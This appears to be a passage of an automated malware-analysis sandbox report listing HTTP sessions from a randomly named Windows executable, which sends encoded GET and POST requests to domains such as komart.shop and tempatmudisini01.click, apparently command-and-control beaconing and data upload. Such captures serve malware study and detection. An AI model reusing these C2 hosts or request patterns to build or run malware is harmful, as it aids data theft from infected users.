                                                                                  Sep 25, 2024 09:57:52.263403893 CEST3867OUTData Raw: 6a 6c 63 33 56 58 76 58 62 63 63 55 6d 6d 6b 79 6a 31 30 32 66 4b 52 6c 72 77 47 45 48 4d 39 79 2f 34 59 36 66 36 4c 4e 36 73 55 6c 5a 49 79 43 4f 32 73 46 46 45 70 39 4f 67 56 4a 61 35 70 44 64 50 6e 41 61 33 76 4c 4d 61 49 36 5a 65 42 4e 4e 52
                                                                                  Data Ascii: jlc3VXvXbccUmmkyj102fKRlrwGEHM9y/4Y6f6LN6sUlZIyCO2sFFEp9OgVJa5pDdPnAa3vLMaI6ZeBNNRL8y35S+o6tzNGBIUiHeLlGqY2wZmI1LgBMuNbzUkaNgjAeHGhmMVdPgPITC0yODZutOgE/LwCOyfXEa/C1BKLBFbBnr1Vglt/j/K9CICekCDLg4k4QnZqD2lyscwS+CRNt1t+qMNCjCnvegsKOc+KIbFwLz0H7o3B
                                                                                  Sep 25, 2024 09:57:52.263437033 CEST1564OUTData Raw: 73 75 4c 38 66 4c 53 50 35 4c 35 41 50 7a 2b 45 64 35 47 36 4a 4e 35 34 33 2b 59 46 4f 35 71 6e 31 58 33 55 67 35 59 43 6e 48 50 64 5a 36 74 63 76 41 4b 43 4d 76 64 39 55 41 74 5a 64 35 38 4b 51 79 46 6f 57 6a 4b 7a 46 43 41 36 41 59 59 58 4c 44
                                                                                  Data Ascii: suL8fLSP5L5APz+Ed5G6JN543+YFO5qn1X3Ug5YCnHPdZ6tcvAKCMvd9UAtZd58KQyFoWjKzFCA6AYYXLDhZ8b0FHwjr5KWGw8uR0vRN5gZsOiQJldCUd1nCcSaqYXiD8IEQPrTX4lV8FN4xnE8Kg1kp7LQe02cWLm/f8CohacjS+dhD/Flk4aurPTgIgeOTyqhSLPElejBtvOeTdXaKVmhaNZzuYTYbs52+PmNw0auzWcaaHPC
                                                                                  Sep 25, 2024 09:57:52.935847998 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  x-powered-by: PHP/7.4.33
                                                                                  x-litespeed-tag: 894_HTTP.404
                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                                                                  x-litespeed-cache-control: no-cache
                                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                  transfer-encoding: chunked
                                                                                  content-encoding: br
                                                                                  vary: Accept-Encoding
                                                                                  date: Wed, 25 Sep 2024 07:57:52 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 [TRUNCATED]
                                                                                  Data Ascii: 2d1b-QG0R|"!|1tkdj'c?[z/WIZcPgKuSV0MivuTlu{b0Bx^+D6a2PhjG.ef:~xY0.;NAM?_AQ8"9!GnE="w}[h?8g*;q@Y8? q@&M[8`}e;+B7K-yOv;%38TZB}Ax=ZitssmoeYdgu'PFi.:?4XWCN2>dg3*M62/C/gl]CFR@JrCJ3O6:.$I9Zf"g>d@!gBw:T(<NjBWzF}6\+ `^f?T'I80Oq;1&cpk"nLa^qrz^>'<?vIz?'A8$RnW~^cRN}-abY-IxV_Yr*IRxqHym"5Q0/~tN\bdv ?DF:KWEJjf*pZA-fdr_5a
                                                                                  Sep 25, 2024 09:57:52.935925007 CEST1289INData Raw: 28 71 2d b5 f7 f6 2e b0 5c d8 59 72 e8 af 20 23 b0 c2 67 a8 b0 b8 80 e1 a2 b2 f6 ef 3d 66 70 b2 d3 6d 33 a1 94 d9 cc 54 9e 46 72 44 d1 48 7d f8 1a ea 98 b3 a3 f0 34 a7 97 9e 1e 8b b9 53 9e 4f 79 31 e5 e5 94 56 ca 5a 7e 59 39 2b 96 d8 41 c1 e6 eb
                                                                                  Data Ascii: (q-.\Yr #g=fpm3TFrDH}4SOy1VZ~Y9+A%vW2H5QRhg|,pr9kTb2;w:UQUQa~XayV*X 7xFd2I\G0&umf9[:BG*5KZ&_hv
                                                                                  Sep 25, 2024 09:57:52.935939074 CEST1289INData Raw: fe ba f9 41 86 fa 18 87 64 ac 85 47 d2 2a 71 20 65 e0 7b 43 c7 98 92 87 be d9 cc eb 87 be 69 db f9 43 df 22 6f 1f fa 82 f3 e6 a1 2f 56 62 3d b7 38 02 fa d9 fb 11 24 df df e4 e5 0d ea c1 4d 2b fe df eb 9c 2c 46 44 14 68 69 c9 74 fa f3 70 db 76 f1
                                                                                  Data Ascii: AdG*q e{CiC"o/Vb=8$M+,FDhitpv7zg,S^@ps\LyY"nIZvob{x>b9?=I8pcCnphZl36S}xx!YvOU<<<) =7IRQ9v?:9h
                                                                                  Sep 25, 2024 09:57:52.935954094 CEST1289INData Raw: ca 93 fa d9 7e 4d c3 77 c8 80 9d 86 21 6b 45 d0 60 82 52 d1 db 4b e9 60 5c 73 45 59 d7 a0 9b dc 9a d2 e8 71 43 11 99 2b 53 9e 17 e8 25 0d c6 28 5f 19 4a df 62 a1 6d 0d d3 f2 96 b7 5c d7 20 61 31 fd 0b 48 ed d1 05 74 3a 3c 60 b1 85 1d f6 e9 69 2f
                                                                                  Data Ascii: ~Mw!kE`RK`\sEYqC+S%(_Jbm\ a1Ht:<`i/gVi0BW3HyN="]$]x;6/i)81t/j y$]c-E(fNdA%>Td!iabOxE
                                                                                  Sep 25, 2024 09:57:52.935967922 CEST1289INData Raw: e5 0f 0c e6 9d c0 8e 5d ea a1 e4 68 b2 50 32 9a f6 b4 b6 b6 e9 7f 7b 12 af 94 3d ad 18 a0 24 b1 4f 5c e0 e3 89 5d 15 f6 21 96 f8 78 c0 38 0a 47 08 cc f7 81 03 d8 4d 82 fb 08 b9 d4 3d ad 77 bf dc e3 70 78 9f b8 df be 27 8e 90 a2 a7 69 f5 38 0f ff
                                                                                  Data Ascii: ]hP2{=$O\]!x8GM=wpx'i8>C/?^}l,sKNbr~{#c1Bx|=`XC9.dwrj(4c^!b A)j.`ra4OQXh>
                                                                                  Sep 25, 2024 09:57:52.935981035 CEST1289INData Raw: 77 f3 46 f4 7a 9f db 34 55 2e c2 f7 f9 78 8c 09 6e 61 8e cb 05 65 67 b9 de 6f 04 7e 92 94 72 56 ac 9c 26 a9 40 49 64 b1 1a f3 24 3d c9 d4 b4 9e 64 ea 91 93 51 34 be 1f 42 c5 2d c8 52 d6 d5 84 02 fb 9e d6 dc 82 2e b9 d9 16 72 0b 88 06 5c 42 7a 61
                                                                                  Data Ascii: wFz4U.xnaego~rV&@Id$=dQ4B-R.r\Bza4:YszB'S/O)!P/53uG$)OQ]Hu;0_3fQ880{p(K"&'+xPJcUET5n
                                                                                  Sep 25, 2024 09:57:52.935992956 CEST1289INData Raw: bb 50 50 39 84 2d b4 72 8a 37 07 dc ca 29 df fa 62 92 52 21 00 5b 7a f7 85 d2 b2 96 90 bc d0 28 9d 58 e2 e4 85 3e f9 64 f9 95 50 04 78 c1 ab 86 6a 2a ea cf a5 31 4f 63 4b 65 de 0a 9f 65 69 73 ba d0 3c 2a 4b 97 ff 85 36 3b e6 8a a1 91 e1 21 af 0c
                                                                                  Data Ascii: PP9-r7)bR![z(X>dPxj*1OcKeeis<*K6;!QCf,F;Ondd2pv9xvx9w}qm~C#oH}%BhT^OrgweX%+&NG|d
                                                                                  Sep 25, 2024 09:57:52.936068058 CEST1289INData Raw: 55 f5 c8 cd 97 09 cd 7b 76 1f 99 78 b5 cf a5 36 7c 14 da fe 3c fd 4c 3c 39 fd 03 22 f7 ba ea f0 7b 02 aa 69 02 8a e9 f3 29 79 5a 9c d2 49 5f 61 8e b1 24 6f 43 19 f7 1b aa 7b 15 29 15 ed 35 bf 0e d9 98 69 1c e7 5a 37 c2 d7 3e 34 5d ad 7b dd c9 4a
                                                                                  Data Ascii: U{vx6|<L<9"{i)yZI_a$oC{)5iZ7>4]{J7N.aPCCKmmoqDcy9C%piopKLdB3Je@/&(qPP"&8*#LYsSh@/-]AplQvH,5D`@g
                                                                                  Sep 25, 2024 09:57:52.936136007 CEST1289INData Raw: 15 09 ae 47 02 a1 d1 21 f6 0a cd ea be 21 bb 3b 87 75 80 73 45 16 04 2e 15 59 b3 a5 ad db d1 dc 5e ec 6c ce 96 15 54 c6 45 09 f9 cb ac cc 9f 0e 3b 93 bf 31 35 32 66 76 4e c1 92 03 20 50 93 1a 59 67 1a a1 68 1e 40 b0 93 66 28 95 4e 87 8d 2e c1 58
                                                                                  Data Ascii: G!!;usE.Y^lTE;152fvN PYgh@f(N.XAd:-jpKO;(gRAuB^s'/4}4G?c\G(uftKPjN{E=|pF!l&)\9$"8_~V"HpcI,JOM


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  49192.168.11.2049805103.21.221.4803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:57:55.139872074 CEST556OUTGET /iydt/?Xb3xI=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z+iB4Tcv9O6cZB31p1Mi5MvPz0n4i/4vc8VuesM/xDDO+6C7ZbX/5xARUztqgUqGu06GFp6xk=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.tempatmudisini01.click
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:57:55.746186018 CEST529INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  x-powered-by: PHP/7.4.33
                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  x-redirect-by: WordPress
                                                                                  location: http://tempatmudisini01.click/iydt/?Xb3xI=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z+iB4Tcv9O6cZB31p1Mi5MvPz0n4i/4vc8VuesM/xDDO+6C7ZbX/5xARUztqgUqGu06GFp6xk=&O4bP=9dRH6ZfHbJX
                                                                                  x-litespeed-cache: miss
                                                                                  content-length: 0
                                                                                  date: Wed, 25 Sep 2024 07:57:55 GMT
                                                                                  server: LiteSpeed


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  50192.168.11.2049806133.130.35.90803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:58:02.025504112 CEST807OUTPOST /qwk1/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.komart.shop
                                                                                  Origin: http://www.komart.shop
                                                                                  Referer: http://www.komart.shop/qwk1/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 2b 73 36 62 5a 58 41 59 48 6e 61 6d 63 78 61 36 66 6a 41 73 52 38 30 6f 73 79 6c 7a 65 64 74 68 6e 70 35 62 34 32 79 72 51 73 4b 41 6d 34 61 37 6b 75 76 4a 74 41 67 54 77 5a 31 55 38 54 64 55 6d 2f 58 74 35 76 4c 4f 66 62 59 55 44 35 65 74 41 4b 34 42 4e 6b 45 42 48 6e 65 31 5a 56 74 73 30 54 41 5a 47 76 56 51 48 49 71 52 49 2f 4c 32 63 79 42 4a 4f 35 42 64 42 75 65 58 52 44 39 58 66 6e 71 76 6a 54 74 6d 65 36 72 65 4b 53 72 70 68 2f 74 31 66 48 36 54 38 61 59 6d 2b 6e 57 66 65 54 36 75 73 2f 6b 53 31 59 79 62 41 2b 6f 30 67 55 51 57 70 4f 32 72 43 69 71 62 6c 30 44 6e 49 77 3d 3d
                                                                                  Data Ascii: Xb3xI=+s6bZXAYHnamcxa6fjAsR80osylzedthnp5b42yrQsKAm4a7kuvJtAgTwZ1U8TdUm/Xt5vLOfbYUD5etAK4BNkEBHne1ZVts0TAZGvVQHIqRI/L2cyBJO5BdBueXRD9XfnqvjTtme6reKSrph/t1fH6T8aYm+nWfeT6us/kS1YybA+o0gUQWpO2rCiqbl0DnIw==
                                                                                  Sep 25, 2024 09:58:02.308358908 CEST668INHTTP/1.1 404 Not Found
                                                                                  content-encoding: gzip
                                                                                  content-type: text/html
                                                                                  date: Wed, 25 Sep 2024 07:58:02 GMT
                                                                                  etag: W/"66d6a4ca-2b5"
                                                                                  server: nginx
                                                                                  vary: Accept-Encoding
                                                                                  content-length: 454
                                                                                  connection: close
                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                                                                                  Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  51192.168.11.2049807133.130.35.90803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:58:04.830764055 CEST827OUTPOST /qwk1/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.komart.shop
                                                                                  Origin: http://www.komart.shop
                                                                                  Referer: http://www.komart.shop/qwk1/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 2b 73 36 62 5a 58 41 59 48 6e 61 6d 63 51 4b 36 51 67 6f 73 57 63 30 72 31 43 6c 7a 48 74 73 6d 6e 75 78 62 34 79 71 37 52 65 75 41 6d 64 2b 37 6c 71 44 4a 71 41 67 54 34 35 31 64 6a 44 63 35 6d 2f 61 4e 35 71 72 4f 66 62 4d 55 44 34 75 74 42 38 77 47 4d 30 45 48 4c 48 65 37 64 56 74 73 30 54 41 5a 47 73 70 70 48 49 79 52 49 71 44 32 64 51 70 4b 56 5a 42 53 43 75 65 58 56 44 39 54 66 6e 72 4b 6a 53 77 44 65 34 6a 65 4b 54 62 70 6d 72 42 36 51 48 36 76 6a 4b 5a 58 76 30 33 49 53 67 37 54 6a 39 46 50 7a 37 43 47 42 6f 35 75 39 6d 6b 79 71 64 71 5a 47 53 54 7a 6e 32 43 38 56 33 35 76 70 77 77 42 70 79 4e 77 36 58 48 6d 37 39 57 78 46 44 4d 3d
                                                                                  Data Ascii: Xb3xI=+s6bZXAYHnamcQK6QgosWc0r1ClzHtsmnuxb4yq7ReuAmd+7lqDJqAgT451djDc5m/aN5qrOfbMUD4utB8wGM0EHLHe7dVts0TAZGsppHIyRIqD2dQpKVZBSCueXVD9TfnrKjSwDe4jeKTbpmrB6QH6vjKZXv03ISg7Tj9FPz7CGBo5u9mkyqdqZGSTzn2C8V35vpwwBpyNw6XHm79WxFDM=
                                                                                  Sep 25, 2024 09:58:05.105915070 CEST668INHTTP/1.1 404 Not Found
                                                                                  content-encoding: gzip
                                                                                  content-type: text/html
                                                                                  date: Wed, 25 Sep 2024 07:58:04 GMT
                                                                                  etag: W/"66d6a4ca-2b5"
                                                                                  server: nginx
                                                                                  vary: Accept-Encoding
                                                                                  content-length: 454
                                                                                  connection: close
                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                                                                                  Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  52192.168.11.2049808133.130.35.90803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:58:07.624305010 CEST2578OUTPOST /qwk1/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.komart.shop
                                                                                  Origin: http://www.komart.shop
                                                                                  Referer: http://www.komart.shop/qwk1/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 2b 73 36 62 5a 58 41 59 48 6e 61 6d 63 51 4b 36 51 67 6f 73 57 63 30 72 31 43 6c 7a 48 74 73 6d 6e 75 78 62 34 79 71 37 52 65 6d 41 6d 76 32 37 6c 4e 58 4a 72 41 67 54 79 5a 31 59 6a 44 63 42 6d 2f 53 53 35 71 76 6b 66 5a 30 55 44 65 79 74 56 5a 51 47 47 30 45 48 55 33 65 36 5a 56 74 31 30 54 51 64 47 76 52 70 48 49 79 52 49 74 7a 32 61 43 42 4b 53 70 42 64 42 75 65 44 52 44 39 33 66 6a 48 38 6a 53 6b 39 65 4c 62 65 50 44 4c 70 6a 59 35 36 5a 48 36 70 69 4b 5a 50 76 30 36 50 53 67 6d 71 6a 2b 59 61 7a 35 69 47 44 39 51 66 6c 45 6b 70 34 50 71 37 45 67 54 36 7a 48 47 71 57 48 78 79 73 58 56 68 6f 45 56 63 34 42 54 55 6f 34 2b 67 55 57 42 7a 4d 38 52 47 73 42 66 53 45 52 6b 4c 70 79 2f 75 6f 4c 31 4a 49 55 51 2f 67 70 2b 7a 77 2b 77 74 61 6d 78 4a 71 72 67 30 4f 6e 35 42 2b 77 58 34 31 73 62 78 74 42 6e 58 75 2b 42 36 68 76 47 33 77 47 75 2f 4d 6b 6e 52 75 43 73 56 64 47 66 6a 72 79 70 6a 35 34 58 50 39 6f 79 31 76 65 58 58 68 6c 67 69 63 75 55 68 6f 57 58 70 64 68 6c 78 6c 61 30 74 [TRUNCATED]
                                                                                  Data Ascii: Xb3xI=+s6bZXAYHnamcQK6QgosWc0r1ClzHtsmnuxb4yq7RemAmv27lNXJrAgTyZ1YjDcBm/SS5qvkfZ0UDeytVZQGG0EHU3e6ZVt10TQdGvRpHIyRItz2aCBKSpBdBueDRD93fjH8jSk9eLbePDLpjY56ZH6piKZPv06PSgmqj+Yaz5iGD9QflEkp4Pq7EgT6zHGqWHxysXVhoEVc4BTUo4+gUWBzM8RGsBfSERkLpy/uoL1JIUQ/gp+zw+wtamxJqrg0On5B+wX41sbxtBnXu+B6hvG3wGu/MknRuCsVdGfjrypj54XP9oy1veXXhlgicuUhoWXpdhlxla0tT7BiQeelXB9c+H2yiLp59BTe0bZeWluQG/9ynjchzbnJnazrwgwiOy3g3WgKIWKCtnTTBWbi+FEyF8j8xxkCMjXuKfU2w5lVPH/Bboi9kxpM+/RZ6cwXWwWQWPoMZ45T3YLR3DhD8dUXPErp5NW5iNCkymjAJvmykjqTXyWCy68hyviYh3Dqix1LX0gSAsUvMBNzXCvf++VPZxQEQHEor/8fwzZyeujzH9z+OsrbokYk1Xqec7qEedFCxRpJwct1maXxKfXzG1L5s1In8y9dy02aG3Gat9t3DzKX9VYooJtolN+PC3c90Rylk/jSC8bbfd7I3I+tAkz8iiCgUMa8y2eJNK6F1t9aHUauM2xTNz99k3xUNa0RBkOotIaAfVcZZR8iO46yDP0EAjXzb7c7/DHHYkvfGTpAt5c1e3ZfLASWp/JF6jv6epgOp9GrDJo+VkDYFWCx9JtkXG9me1UcBVyR24l5SQSdhzWZspXgaGdS/IxmMoYab+4fdQwdtxOovlM3NISPcXV/AhHO18c4jNv4rK5rJkPXHgMWiOgWXMEZaTfFDBvk2+Tvb2L8GYUGCuFEXqD8ZhFFpTtQ3GPpKYRvw9JSlhZUayQNuRVY3FwSXl8AOqqOakXCnL84/NLZ21Zz03AG93bJZQvkPhGtqr1lLpv/TVlA9J [TRUNCATED]
                                                                                  Sep 25, 2024 09:58:07.624382973 CEST5398OUTData Raw: 71 64 59 74 73 69 44 2f 2b 32 35 6f 55 55 4c 6b 33 6f 35 39 56 70 6b 71 34 36 2f 75 6a 4c 63 57 52 66 31 37 41 66 53 72 6f 6f 56 74 45 31 56 73 4c 73 45 49 75 51 30 53 47 30 4a 48 74 62 54 7a 37 52 2b 71 69 54 39 4b 4d 79 51 53 43 38 76 36 4d 34
                                                                                  Data Ascii: qdYtsiD/+25oUULk3o59Vpkq46/ujLcWRf17AfSrooVtE1VsLsEIuQ0SG0JHtbTz7R+qiT9KMyQSC8v6M4IApByBplxzKJaIph49xGB18aztzpfN/reYSa7+O6200PFH9kKby2Xymu7VwuU3gB08Itpah3JcE5IhMftCmgyHqd/MeHCmWY+j7AAD+aOxvvAYL35CCyrlRZD3y0D8IjMa19fktTBb6qJyDfhPzJ5D7U5fQAnBFyX
                                                                                  Sep 25, 2024 09:58:07.910007954 CEST668INHTTP/1.1 404 Not Found
                                                                                  content-encoding: gzip
                                                                                  content-type: text/html
                                                                                  date: Wed, 25 Sep 2024 07:58:07 GMT
                                                                                  etag: W/"66d6a4ca-2b5"
                                                                                  server: nginx
                                                                                  vary: Accept-Encoding
                                                                                  content-length: 454
                                                                                  connection: close
                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
